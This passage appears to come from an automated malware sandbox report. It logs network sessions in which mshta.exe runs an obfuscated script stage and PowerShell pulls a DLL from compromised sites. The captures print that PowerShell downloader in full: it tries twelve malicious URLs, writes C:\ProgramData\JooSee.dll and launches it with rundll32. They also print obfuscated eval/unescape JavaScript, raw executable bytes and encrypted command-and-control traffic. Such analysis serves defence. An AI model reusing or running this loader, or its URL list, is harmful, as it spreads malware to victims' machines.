                                                                                                                  Data Ascii: 3}}Z}$},}oB}A}d2}~|}c}:}.}}01}2}{}}~}pq}1}[}57}q}~6}@75}>6c}:4i}H}AE}}|}:}o}@}l|7Bif}X}1d}Hcument}E}T4o|||6|8M}S1}U}T5}|(|(|1| 6}9|@|7|92Ea}>4|V|*|}Uo}T|O5|6|!|REwr}>1t|G|/}2||2}d|}:
                                                                                                                  Jan 28, 2022 21:01:33.943295956 CET4INData Raw: 2d 78 7b 7e 48 78 7e 78 30 7f 36 78 32 7f 3e 7f 54 7f 68 78 47 7f 73 77 5c 6e 7f 72 79 5a 7f 20 78 2a 78 1f 7f 20 7f 6f 7f 66 7f 20 7f 74 7f 68 7f 69 7f 73 7f 20 7b 57 7a 73 7f 20 77 25 77 5c 27 77 09 78 09 7f 63 78 09 78 5c 27 7f 62 7f 79 7f 20
                                                                                                                  Data Ascii: -x{~Hx~x06x2>ThxGsw\nryZ x*x of this {Wzs w%w\'wxcxx\'by <b~gxJxCxExxwx} xFCCw~#~% Guardx]nyzxJ~g/w6w4brww ul~2maxw"ox+w`w,ow.t yw wE~&wexZiw]zssxZJa} }p{&twt wv}y|xw~
                                                                                                                  Jan 28, 2022 21:01:33.943336964 CET6INData Raw: 32 4b 63 49 38 48 57 51 50 41 38 5b 30 5d 2b 3d 27 32 7e 34 78 53 7f 6e 7e 34 7f 65 78 7a 78 2b 77 0f 77 3f 77 7a 62 77 42 78 32 7e 09 7f 72 7a 17 78 16 7e 70 7e 40 7f 2f 7e 42 7f 77 7f 2e 7f 70 77 2d 76 1a 76 47 7f 2e 78 2a 7f 6d 78 1b 78 5c 72
                                                                                                                  Data Ascii: 2KcI8HWQPA8[0]+='2~4xSn~4exzx+ww?wzbwBx2~rzx~p~@/~Bw.pw-vvG.x*mxx\r~Ixdx_x~.kx#wTw7vv0w;xIvxLxNxPxRxTxVxXxZx\\x^wkxaxcxexgsxixkxmfxoxq~0xtxvxxv?x|x~vCwC0wwwwww\rv@w>x/0x1x">vM.Pw-WwJv&vUwOvwQw6yzawQ~du#v-/x
                                                                                                                  Jan 28, 2022 21:01:33.943380117 CET7INData Raw: 28 71 38 7e 58 73 4b 78 66 78 6c 7e 5c 27 7f 3a 73 14 72 44 71 13 7b 69 71 15 7f 28 7f 37 7f 39 7f 2c 71 50 71 52 71 51 7b 21 71 52 73 36 71 56 71 59 71 58 71 5b 71 57 75 2d 77 55 7d 7a 62 7f 6b 7f 3b 71 46 78 47 7f 32 71 49 72 66 74 05 7f 65 72
                                                                                                                  Data Ascii: (q8~XsKxfxl~\':srDq{iq(79,qPqRqQ{!qRs6qVqYqXq[qWu-wU}zbk;qFxG2qIrfterrqMru38,47qoqq}hqo1s75,qQqQ{qwqwq^vGaqaqc 3qfqKqiqru0,qmpqnqtqQpqy,q|qt}hqq`qbtxG4pu0qLrtqp\rqpqrq}z-q}qzp2q}p;q_pu.zawZtpqhqjp!
                                                                                                                  Jan 28, 2022 21:01:33.943420887 CET9INData Raw: 25 32 39 25 32 43 25 36 43 25 33 30 25 33 44 6e 25 36 35 5c 31 36 37 25 32 30 5c 31 30 31 25 37 32 72 5c 31 34 31 25 37 39 25 32 38 25 32 39 25 32 43 49 25 36 43 25 33 44 25 33 31 25 33 32 25 33 38 25 33 42 64 5c 31 35 37 25 37 42 6c 25 33 30 25
                                                                                                                  Data Ascii: %29%2C%6C%30%3Dn%65\167%20\101%72r\141%79%28%29%2CI%6C%3D%31%32%38%3Bd\157%7Bl%30%5B%49l%5D%3D%53tr%69\156g%2EfromCh\141%72Co\144%65%28Il%29%7D\167%68%69%6Ce%28%2D%2DI%6C%29%3BIl%3D%31%32%38%3Bl%31%5B%30%5D%3D%6Ci%3Dl%30%5Bl%37%5B%30%5D%5D%3B%
                                                                                                                  Jan 28, 2022 21:01:33.943463087 CET10INData Raw: 34 7f 53 7f 69 78 0f 73 2a 70 43 6f 58 6d 18 7f 28 7f 78 7f 75 7f 75 6e 62 6d 62 6d 21 72 31 6f 29 73 4b 7f 72 7f 3d 6f 40 77 23 6e 52 7e 2e 78 03 74 4c 75 2d 7f 64 70 37 7f 20 7f 44 6e 6d 6c 10 75 67 6f 69 6f 1a 74 1b 74 24 6f 2a 6c 34 73 4b 7f
                                                                                                                  Data Ascii: 4Sixs*pCoXm(xuunbmbm!r1o)sKr=o@w#nR~.xtLu-dp7 Dnmlugoiott$o*l4sKo=s(}y(s,s.}Ks1s3(lroBfx,pzr*25+{?n]lxG{kks,ks>kd*ospB+\'tDosOou;k/k1=ol1klOkk2k.k4tVtOtQx7k5lp{y}w xtXvN}dExc|8Lw%vztw\'wz
                                                                                                                  Jan 28, 2022 21:01:33.943505049 CET11INData Raw: 7f 2e 7e 3e 7f 69 75 2c 67 4d 67 59 7f 28 7f 38 67 63 67 5f 67 73 78 18 7f 34 67 5d 67 2e 7f 22 78 61 7e 7d 69 41 6f 67 77 79 7f 61 74 18 7f 73 77 26 78 39 7f 43 6c 0b 7f 65 68 52 7f 6a 68 56 6f 6d 67 56 7f 29 69 41 7f 63 66 12 7f 76 67 58 67 61
                                                                                                                  Data Ascii: .~>iu,gMgY(8gcg_gsx4g]g."xa~}iAogwyatsw&x9ClehRjhVomgV)iAcfvgXga(gssEg]gwffg^g`s>5pBffff9f#ff\'ff)yx+gsf,f+f&f(f}iyxf1s>xs~f.frgzf7s}pf?gysgx0s~fB08fDf<fIf3s>}xf\nffs.R}wfgMgDbgFnxZffJi_gNx,x
                                                                                                                  Jan 28, 2022 21:01:33.943540096 CET12INData Raw: 20 20 28 62 31 37 64 37 51 4c 42 68 38 67 68 29 3b 62 33 52 5a 34 44 32 78 42 50 77 20 20 20 28 62 31 37 64 37 51 4c 42 68 38 67 68 29 3b 68 57 50 44 66 35 6c 74 53 37 4d 59 37 32 59 32 34 34 20 20 20 20 28 78 32 63 56 58 6c 33 39 29 3b 67 38 35
                                                                                                                  Data Ascii: (b17d7QLBh8gh);b3RZ4D2xBPw (b17d7QLBh8gh);hWPDf5ltS7MY72Y244 (x2cVXl39);g85tUx8O57Sri34='vE7JOE4YL7z2BEimBE630IL966M' ;eval(unescape('%71%79%36%28%22%63%37%39%38%66%62%36%39%66%22%29%3B'));cG3XHY59bDjh8i5+='syQqJrqlvQcnJERouTsFYMXOqfK
                                                                                                                  Jan 28, 2022 21:01:33.943568945 CET12INData Raw: 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                  1192.168.2.224916891.240.118.17280C:\Windows\System32\mshta.exe
                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                  Jan 28, 2022 21:01:38.683579922 CET12OUTGET /gg/ff/fe.png HTTP/1.1
                                                                                                                  Host: 91.240.118.172
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 28, 2022 21:01:38.745675087 CET14INHTTP/1.1 200 OK
                                                                                                                  Server: nginx/1.20.2
                                                                                                                  Date: Fri, 28 Jan 2022 20:01:38 GMT
                                                                                                                  Content-Type: image/png
                                                                                                                  Content-Length: 1199
                                                                                                                  Connection: keep-alive
                                                                                                                  Last-Modified: Fri, 28 Jan 2022 14:54:48 GMT
                                                                                                                  ETag: "4af-5d6a59dbe5e00"
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  Data Raw: 24 70 61 74 68 20 3d 20 22 43 7b 73 65 65 64 61 7d 3a 5c 50 72 7b 73 65 65 64 61 7d 6f 67 72 61 6d 44 7b 73 65 65 64 61 7d 61 74 61 5c 7b 73 65 65 64 61 7d 4a 6f 6f 53 65 65 2e 64 7b 73 65 65 64 61 7d 6c 6c 22 2e 72 65 70 6c 61 63 65 28 27 7b 73 65 65 64 61 7d 27 2c 27 27 29 3b 0d 0a 24 75 72 6c 31 20 3d 20 27 68 74 74 70 3a 2f 2f 68 6f 73 74 66 65 65 6c 69 6e 67 2e 63 6f 6d 2f 77 70 2d 61 64 6d 69 6e 2f 34 58 73 6a 74 4f 54 37 63 46 48 76 42 56 33 48 5a 2f 27 3b 0d 0a 24 75 72 6c 32 20 3d 20 27 68 74 74 70 3a 2f 2f 6a 75 72 6e 61 6c 70 6a 66 2e 6c 61 6e 2e 67 6f 2e 69 64 2f 61 73 73 65 74 73 2f 69 4d 2f 27 3b 0d 0a 24 75 72 6c 33 20 3d 20 27 68 74 74 70 3a 2f 2f 69 74 2d 6f 2e 62 69 7a 2f 62 69 74 72 69 78 2f 78 6f 44 64 44 65 2f 27 3b 0d 0a 24 75 72 6c 34 20 3d 20 27 68 74 74 70 3a 2f 2f 62 69 6d 65 73 61 72 61 79 65 6e 6f 76 69 6e 2e 69 72 2f 77 70 2d 61 64 6d 69 6e 2f 47 31 70 59 47 4c 2f 27 3b 0d 0a 24 75 72 6c 35 20 3d 20 27 68 74 74 70 3a 2f 2f 67 61 72 64 65 6e 69 6e 67 66 69 6c 6d 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 63 4d 56 55 59 44 51 33 71 2f 27 3b 0d 0a 24 75 72 6c 36 20 3d 20 27 68 74 74 70 3a 2f 2f 64 61 69 73 79 2e 73 75 6b 6f 62 75 72 75 2d 73 65 63 75 72 65 2e 63 6f 6d 2f 38 70 6c 6b 73 2f 76 38 6c 79 5a 54 65 2f 27 3b 0d 0a 24 75 72 6c 37 20 3d 20 27 68 74 74 70 73 3a 2f 2f 70 72 6f 70 65 72 74 79 2d 65 67 2e 63 6f 6d 2f 6d 6c 7a 6b 69 72 2f 39 37 76 2f 27 3b 0d 0a 24 75 72 6c 38 20 3d 20 27 68 74 74 70 3a 2f 2f 74 6f 74 61 6c 70 6c 61 79 74 75 78 74 6c 61 2e 63 6f 6d 2f 73 69 74 69 6f 2f 44 67 6b 74 4c 33 7a 64 2f 27 3b 0d 0a 24 75 72 6c 39 20 3d 20 27 68 74 74 70 3a 2f 2f 6d 61 78 74 64 65 76 65 6c 6f 70 65 72 2e 63 6f 6d 2f 6f 6b 77 39 79 78 2f 47 63 32 38 5a 58 2f 27 3b 0d 0a 24 75 72 6c 31 30 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 69 6e 61 62 6c 72 2e 63 6f 6d 2f 65 6c 65 6e 63 74 69 63 2f 66 4d 46 74 52 72 62 73 45 58 31 67 58 75 33 5a 31 4d 2f 27 3b 0d 0a 24 75 72 6c 31 31 20 3d 20 27 68 74 74 70 3a 2f 2f 61 63 74 69 76 65 74 72 61 69 6e 69 6e 67 2e 73 79 74 65 73 2e 6e 65 74 2f 6c 69 62 72 61 72 69 65 73 2f 38 73 2f 27 3b 0d 0a 24 75 72 6c 31 32 20 3d 20 27 68 74 74 70 73 3a 2f 2f 67 75 64 61 6e 67 74 61 73 6f 72 69 63 68 69 6e 61 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 47 47 30 31 63 2f 27 3b 0d 0a 0d 0a 24 77 65 62 20 3d 20 4e 65 77 2d 4f 62 6a 65 63 74 20 6e 65 74 2e 77 65 62 63 6c 69 65 6e 74 3b 0d 0a 24 75 72 6c 73 20 3d 20 22 24 75 72 6c 31 2c 24 75 72 6c 32 2c 24 75 72 6c 33 2c 24 75 72 6c 34 2c 24 75 72 6c 35 2c 24 75 72 6c 36 2c 24 75 72 6c 37 2c 24 75 72 6c 38 2c 24 75 72 6c 39 2c 24 75 72 6c 31 30 2c 24 75 72 6c 31 31 2c 24 75 72 6c 31 32 22 2e 73 70 6c 69 74 28 22 2c 22 29 3b 0d 0a 66 6f 72 65 61 63 68 20 28 24 75 72 6c 20 69 6e 20 24 75 72 6c 73 29 20 7b 0d 0a 20 20 20 74 72 79 20 7b 0d 0a 20 20 20 20 20 20 20 24 77 65 62 2e 44 6f 77 6e 6c 6f 61 64 46 69 6c 65 28 24 75 72 6c 2c 20 24 70 61 74 68 29 3b 0d 0a 20 20 20 20 20 20 20 69 66 20 28 28 47 65 74 2d 49 74 65 6d 20 24 70 61 74 68 29 2e 4c 65 6e 67 74 68 20 2d 67 65 20 33 30 30 30 30 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 5b 44 69 61 67 6e 6f 73 74 69 63 73 2e 50 72 6f 63 65 73 73 5d 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 62 72 65 61 6b 3b 0d 0a 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 7d 0d
                                                                                                                  Data Ascii: $path = "C{seeda}:\Pr{seeda}ogramD{seeda}ata\{seeda}JooSee.d{seeda}ll".replace('{seeda}','');$url1 = 'http://hostfeeling.com/wp-admin/4XsjtOT7cFHvBV3HZ/';$url2 = 'http://jurnalpjf.lan.go.id/assets/iM/';$url3 = 'http://it-o.biz/bitrix/xoDdDe/';$url4 = 'http://bimesarayenovin.ir/wp-admin/G1pYGL/';$url5 = 'http://gardeningfilm.com/wp-content/pcMVUYDQ3q/';$url6 = 'http://daisy.sukoburu-secure.com/8plks/v8lyZTe/';$url7 = 'https://property-eg.com/mlzkir/97v/';$url8 = 'http://totalplaytuxtla.com/sitio/DgktL3zd/';$url9 = 'http://maxtdeveloper.com/okw9yx/Gc28ZX/';$url10 = 'http://www.inablr.com/elenctic/fMFtRrbsEX1gXu3Z1M/';$url11 = 'http://activetraining.sytes.net/libraries/8s/';$url12 = 'https://gudangtasorichina.com/wp-content/GG01c/';$web = New-Object net.webclient;$urls = "$url1,$url2,$url3,$url4,$url5,$url6,$url7,$url8,$url9,$url10,$url11,$url12".split(",");foreach ($url in $urls) { try { $web.DownloadFile($url, $path); if ((Get-Item $path).Length -ge 30000) { [Diagnostics.Process]; break; } }
                                                                                                                  Jan 28, 2022 21:01:38.745712042 CET14INData Raw: 0a 20 20 20 63 61 74 63 68 7b 7d 0d 0a 7d 20 0d 0a 53 6c 65 65 70 20 2d 73 20 34 3b 63 6d 64 20 2f 63 20 43 3a 5c 57 69 6e 64 6f 77 73 5c 53 79 73 57 6f 77 36 34 5c 72 75 6e 64 6c 6c 33 32 2e 65 78 65 20 27 43 3a 5c 50 72 6f 67 72 61 6d 44 61 74
                                                                                                                  Data Ascii: catch{}} Sleep -s 4;cmd /c C:\Windows\SysWow64\rundll32.exe 'C:\ProgramData\JooSee.dll',ssAAqq;


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                  2192.168.2.2249170103.206.244.10580C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                  Jan 28, 2022 21:02:00.181602955 CET15OUTGET /assets/iM/ HTTP/1.1
                                                                                                                  Host: jurnalpjf.lan.go.id
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 28, 2022 21:02:00.370345116 CET17INHTTP/1.1 200 OK
                                                                                                                  Date: Fri, 28 Jan 2022 20:02:00 GMT
                                                                                                                  Server: Apache/2.4.6 (CentOS) PHP/7.4.27
                                                                                                                  X-Powered-By: PHP/7.4.27
                                                                                                                  Set-Cookie: 61f44bb842acf=1643400120; expires=Fri, 28-Jan-2022 20:03:00 GMT; Max-Age=60; path=/
                                                                                                                  Cache-Control: no-cache, must-revalidate
                                                                                                                  Pragma: no-cache
                                                                                                                  Last-Modified: Fri, 28 Jan 2022 20:02:00 GMT
                                                                                                                  Expires: Fri, 28 Jan 2022 20:02:00 GMT
                                                                                                                  Content-Disposition: attachment; filename="uHkwl.dll"
                                                                                                                  Content-Transfer-Encoding: binary
                                                                                                                  Content-Length: 548864
                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Content-Type: application/x-msdownload
                                                                                                                  Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 68 73 c2 61 2c 12 ac 32 2c 12 ac 32 2c 12 ac 32 ef 1d f3 32 26 12 ac 32 ef 1d f1 32 37 12 ac 32 2c 12 ad 32 0e 10 ac 32 0b d4 d1 32 36 12 ac 32 0b d4 c1 32 a6 12 ac 32 0b d4 c2 32 b2 12 ac 32 0b d4 d6 32 2d 12 ac 32 0b d4 d0 32 2d 12 ac 32 0b d4 d4 32 2d 12 ac 32 52 69 63 68 2c 12 ac 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 3e fa f3 61 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 08 00 00 50 04 00 00 00 04 00 00 00 00 00 06 0d 03 00 00 10 00 00 00 60 04 00 00 00 00 10 00 10 00 00 00 10 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 08 00 00 10 00 00 98 df 08 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 40 2d 05 00 52 00 00 00 34 10 05 00 04 01 00 00 00 a0 05 00 50 56 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 00 30 4e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 bd 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 60 04 00 94 05 00 00 ac 0f 05 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 39 45 04 00 00 10 00 00 00 50 04 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 92 cd 00 00 00 60 04 00 00 d0 00 00 00 60 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 80 65 00 00 00 30 05 00 00 30 00 00 00 30 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 50 56 02 00 00 a0 05 00 00 60 02 00 00 60 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 62 93 00 00 00 00 08 00 00 a0 00 00 00 c0 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$hsa,2,2,22&2272,2226222222-22-22-2Rich,2PEL>a!P`@-R4PV0N@`@.text9EP `.rdata``@@.datae000@.rsrcPV``@@.relocb@B
                                                                                                                  Jan 28, 2022 21:02:00.370373011 CET18INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                  Data Ascii:
                                                                                                                  Jan 28, 2022 21:02:00.370387077 CET19INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                  Data Ascii:
                                                                                                                  Jan 28, 2022 21:02:00.370400906 CET21INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                  Data Ascii:
                                                                                                                  Jan 28, 2022 21:02:00.370413065 CET22INData Raw: 4d f8 8b 4d f8 e8 4f 00 00 00 89 45 fc 8b 4d fc e8 04 00 00 00 8b e5 5d c3 55 8b ec 51 89 4d fc 8b 45 fc 83 c0 0c 83 c9 ff f0 0f c1 08 49 85 c9 7f 17 8b 55 fc 52 8b 45 fc 8b 08 8b 55 fc 8b 02 8b 11 8b c8 8b 42 04 ff d0 8b e5 5d c3 cc cc cc cc cc
                                                                                                                  Data Ascii: MMOEM]UQMEIUREUB]UQME]UQMjjdMlYEdhE]UQMEPM"]UQM]Ui]Ujh>
                                                                                                                  Jan 28, 2022 21:02:00.370424986 CET23INData Raw: 89 45 10 85 d2 74 13 8b 4d fc 8a 55 fb 88 11 8b 45 fc 83 c0 01 89 45 fc eb dd 8b 45 08 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 83 ec 0c 8b 45 0c 89 45 f8 8b 4d 08 89 4d fc c7 45 f4 00 00 00 00 eb 09 8b 55 f4 83 c2 01 89 55
                                                                                                                  Data Ascii: EtMUEEE]UEEMMEUUE;EsMMUU]U}thjEPb]UQjh0EPjbEE]U}tEPEM;Mr
                                                                                                                  Jan 28, 2022 21:02:00.370441914 CET25INData Raw: eb 12 8b 4d fc 83 c1 01 89 4d fc 8b 55 e4 83 c2 28 89 55 e4 8b 45 08 8b 08 0f b7 51 06 39 55 fc 0f 8d c0 00 00 00 8b 45 e4 8b 48 08 89 4d dc 8b 55 08 8b 42 30 83 e8 01 f7 d0 23 45 dc 89 45 d8 8b 4d e4 51 8b 55 08 52 8b 4d d4 e8 b5 fd ff ff 89 45
                                                                                                                  Data Ascii: MMU(UEQ9UEHMUB0#EEMQURMEE;EtMM;MvHUB$%tMuUEB$%EMUQ$UEE+EETMQURMu3DEEMMUUEH$MEURE
                                                                                                                  Jan 28, 2022 21:02:00.370454073 CET26INData Raw: 0c 50 8b 4d 08 51 ff 15 a8 62 04 10 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 8b 45 08 50 ff 15 a4 62 04 10 5d c3 cc 55 8b ec 83 ec 60 89 4d a0 c7 45 bc 00 00 00 00 c7 45 f0 00 00 00 00 6a 40 8b 45 0c 50 8b 4d a0 e8 eb f6 ff ff 85 c0
                                                                                                                  Data Ascii: PMQb]UEPb]U`MEEj@EPMu3MMU=MZthb3MQ<REPMu3MUQ<UE8PEthb3xMQLthb3WEH
                                                                                                                  Jan 28, 2022 21:02:00.370465040 CET27INData Raw: 4d fc 8b 55 f0 03 51 24 89 55 e0 c7 45 ec 00 00 00 00 c7 45 e8 00 00 00 00 eb 1b 8b 45 e8 83 c0 01 89 45 e8 8b 4d e4 83 c1 04 89 4d e4 8b 55 e0 83 c2 02 89 55 e0 8b 45 fc 8b 4d e8 3b 48 18 73 2d 8b 55 e4 8b 45 f0 03 02 50 8b 4d 0c 51 e8 3e f1 ff
                                                                                                                  Data Ascii: MUQ$UEEEEMMUUEM;Hs-UEPMQ>uUEE}ujb3)MU;Qvjb3EMHUE]UMEE}uMytUMQP(UjjEHQU
                                                                                                                  Jan 28, 2022 21:02:00.370480061 CET29INData Raw: 05 10 0f af 15 c8 30 05 10 03 ca 8b 15 c8 30 05 10 0f af 15 c4 30 05 10 2b ca 2b 0d c8 30 05 10 2b 0d c4 30 05 10 8b 15 c8 30 05 10 0f af 15 b8 30 05 10 03 0d c4 30 05 10 03 d1 03 15 c4 30 05 10 8b 0d c4 30 05 10 0f af 0d b8 30 05 10 03 d1 2b 15
                                                                                                                  Data Ascii: 000++0+0000000+000000++0+0000000+000000++0+000
                                                                                                                  Jan 28, 2022 21:02:00.549765110 CET30INData Raw: 0d c4 30 05 10 a1 c0 30 05 10 0f af 05 c4 30 05 10 03 c8 2b 0d c0 30 05 10 03 0d c8 30 05 10 2b 0d c4 30 05 10 2b 0d c4 30 05 10 8b 15 c4 30 05 10 0f af 15 c4 30 05 10 03 ca 2b 0d c8 30 05 10 a1 c4 30 05 10 0f af 05 c0 30 05 10 0f af 05 c8 30 05
                                                                                                                  Data Ascii: 000+00+0+000+0000+00+000++00000++00+000+00+0+000+000


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                  3192.168.2.2249172160.16.102.16880C:\Windows\SysWOW64\rundll32.exe
                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                  Jan 28, 2022 21:03:23.207600117 CET585OUTData Raw: 16 03 03 00 92 01 00 00 8e 03 03 61 f4 ca 8f 89 2b 93 5b a5 00 e6 78 7f cf 90 de d8 14 ba 1a f3 bd cf ad 3a b1 af 38 0d b1 83 98 00 00 34 c0 28 c0 27 c0 14 c0 13 00 9f 00 9e 00 39 00 33 00 9d 00 9c 00 3d 00 3c 00 35 00 2f c0 2c c0 2b c0 24 c0 23
                                                                                                                  Data Ascii: a+[x:84('93=<5/,+$#j@821
                                                                                                                  Jan 28, 2022 21:03:23.527287006 CET586INData Raw: 16 03 03 00 5d 02 00 00 59 03 03 7c 86 e2 60 a2 0b db d4 3f bb e1 e0 5e 13 03 52 c0 fe c4 60 63 fe ec 7f 33 0f d0 a8 3e bd f8 69 20 74 b5 00 22 42 fb b3 ff 71 42 38 1e d3 69 f3 68 c6 96 25 02 44 b8 df de fa 32 34 0c d4 c9 e9 a2 c0 28 00 00 11 ff
                                                                                                                  Data Ascii: ]Y|`?^R`c3>i t"BqB8ih%D24(00\*b0*H0w10UGB10ULondon10ULondon10UGlobal Security10UIT De
                                                                                                                  Jan 28, 2022 21:03:23.527343988 CET586INData Raw: 58 04 5c 07 53 4d 94 5b 8d 6c de d5 66 2d 91 7f 69 33 a7 05 f8 64 f4 68 5c 2d 7d 8e a1 61 5e 3f 25 b8 cb 2f 4b dd fe 94 f4 4e 91 0f f7 19 72 13 3d 16 1a 87 50 22 5e f6 81 07 43 7d 71 9d 81 63 1c 7f 7b d6 07 45 68 13 59 c1 3b c9 67 6c 16 03 03 00
                                                                                                                  Data Ascii: X\SM[lf-i3dh\-}a^?%/KNr=P"^C}qc{EhY;gl
                                                                                                                  Jan 28, 2022 21:03:23.545066118 CET587OUTData Raw: 16 03 03 00 46 10 00 00 42 41 04 3a fa 56 d1 e4 15 8f c0 76 0a 5a fc 84 e9 c0 b6 29 75 fe f6 3a e0 81 ed d1 99 3a 80 1b 2c e6 1f a0 bb 9a ee e8 b0 4c 8e 8f 41 03 aa 50 89 df 0b cd 9b d3 b8 d4 13 f5 1f 30 f8 d4 88 cd c0 f0 5a 14 03 03 00 01 01 16
                                                                                                                  Data Ascii: FBA:VvZ)u::,LAP0Z`h%<rcc1Z)zKjwle(0n;(}bpi%\|JsPcO3mdtCRm
                                                                                                                  Jan 28, 2022 21:03:23.850617886 CET587INData Raw: 14 03 03 00 01 01 16 03 03 00 60 1f 17 c3 ea d3 c4 a2 ed 6a c6 09 ac 86 fb 8c 16 00 5e 72 99 91 2b 3e 3c 79 22 5e 57 c2 01 11 da 7f 7c d1 a8 06 13 53 54 44 8f 04 de 54 e6 85 1b ee 7b 07 84 67 82 57 56 ae 1d 0c 44 c8 8f 1e bc 82 0b c3 54 57 72 09
                                                                                                                  Data Ascii: `j^r+><y"^W|STDT{gWVDTWrQaR=_E]E6!X
                                                                                                                  Jan 28, 2022 21:03:35.192365885 CET653OUTData Raw: 17 03 03 02 30 89 c6 c5 ba 15 e8 36 71 da 46 96 f4 20 00 87 c3 b5 0d fa 92 c0 f9 6e 72 bb 44 a6 88 33 6c 5d 7b 6d 16 64 55 ea 0a 69 5f 07 d7 70 4b b2 83 d5 1e e8 d3 66 70 e1 27 ee ad df dc e1 22 d0 45 0b d3 af 03 db 6b 8a 8b 1b ad d2 5c 9c 87 86
                                                                                                                  Data Ascii: 06qF nrD3l]{mdUi_pKfp'"Ek\DJ)aZicA(X+0:x69'kZG^@Rc{N71Tm,=8&Y!KQBZ?|oy/eiU1N6W#!/ukvL{"Z
                                                                                                                  Jan 28, 2022 21:03:36.355695009 CET654INData Raw: 17 03 03 05 00 25 68 3d 9f 3a 0e ab 69 20 ab 12 17 65 87 04 44 72 5d ea 02 83 dc 3b 18 98 02 da 4d 0f fa dd 49 1e bb 55 be 39 d2 09 ac 35 3b e3 6f 7e b3 fb 45 d3 d2 da 30 bd 6e f1 a1 50 48 b6 89 fe b5 07 e4 dc 0d 28 fd 6f 05 a3 d8 24 9d df 7f fb
                                                                                                                  Data Ascii: %h=:i eDr];MIU95;o~E0nPH(o$/]wA`3\n3KkDpM=_xb{OiLF^eTKNb(91.[3uKfXXU/RE/^{ZXRvfCgiQd
                                                                                                                  Jan 28, 2022 21:03:39.355885029 CET654INData Raw: 15 03 03 00 50 f5 01 92 92 1f e0 7b ec de a8 db 28 b8 4a d9 15 56 1b 34 4e 70 3a 66 84 62 2a dc 47 65 44 1b 61 d0 b5 00 0f 76 22 98 26 3b 79 3f 4f 74 aa f3 2e d4 f7 94 25 90 73 c6 49 b9 f8 f4 0c db 28 f9 e2 10 5f 15 7f 42 0e 99 6a 5f 4a a3 03 8f
                                                                                                                  Data Ascii: P{(JV4Np:fb*GeDav"&;y?Ot.%sI(_Bj_J7


                                                                                                                  Statistics

                                                                                                                  CPU Usage

                                                                                                                  Click to jump to process

                                                                                                                  Memory Usage

                                                                                                                  Click to jump to process

